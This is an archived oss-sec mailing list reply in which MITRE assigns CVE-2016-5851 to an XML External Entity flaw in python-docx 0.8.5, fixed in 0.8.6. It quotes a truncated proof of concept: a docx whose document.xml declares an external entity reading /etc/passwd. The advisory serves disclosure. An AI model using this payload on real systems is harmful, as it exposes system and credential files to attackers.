oss-sec mailing list archives

Re: CVE request - python-docx 0.8.5 - XXE

From: cve-assign () mitre org
Date: Tue, 28 Jun 2016 18:53:29 -0400 (EDT)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

The python-docx package
(https://github.com/python-openxml/python-docx) is vulnerable to XML
External Entity attacks (XXE).

Version 0.8.6 (https://github.com/python-openxml/python-docx/releases/tag/v0.8.6)
contains a fix.

xml_string = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE w:document [
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
...
updateZip('whatever.docx', 'word/document.xml', xml_string)
...
document = docx.Document('whatever.docx')


Use CVE-2016-5851.

- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJXcv+EAAoJEHb/MwWLVhi2iGIP/iS3BoqMNj+DVhTwEE9w+BQJ
O6RXn8MsUBUQT8eo5HR+2gecYDP3vuj4I7BrAhFesXAkabTxsxFRHZqOOqmvG0ij
8f+m/heZFBl9CQywSJLOT+K9eQ4442Bs01c0Ex/e+Y0RfmMP50azlIQMZaNeNQS8
+2AsgU7V2nIscTKRF39ciP2fGywsrkH+zlTbA1HSct9ZrFnPog6f4Exkoaru06lg
lFzUJoG/JRLW8SuAZ2uNeuFEKlvhE8bfhy/TBva5IwjnBUfIAp0nQ9EjyCywTGOq
cmMrVpq8fzhACzE8Nq+BKKFTZ07YSXFB8fYJ8U3p6ztG7iCfZ/neIiuXm8JVsJB2
gytmOWgqjenUO/IpLgHLxAvOQ+rrRhYAC39XZT6cRrXvoyVnm8TLRmIzkNoItwrQ
JAMtPzkEKWJurtvUuPFZ3DhpdPYXdOzczK2zS54XUONiMfw67fb/Rmx5mez6k7tr
B/9fOB3ai+kMg1okYojgENJJhXxOtbtekPMkMY8pQJM1CvYW32So3FIn7TfrD6hX
wJWqHfok1k5/+vki7XO7wxoNuYGObRq2IGLlz1JpZs6iR5QIIRxE4l8Lx2c43lwr
OeEfZMClCsAo16VYRJMBOIT15hgpfmXMIekk63nhtx7NOzoCzAUTgRvv6fjQ4yNG
x8/OUsWj1ULmPDDqpiUt
=X9jU
-----END PGP SIGNATURE-----

Current thread:

CVE request - python-docx 0.8.5 - XXE Pierre Ernst (Jun 28)
- Re: CVE request - python-docx 0.8.5 - XXE cve-assign (Jun 28)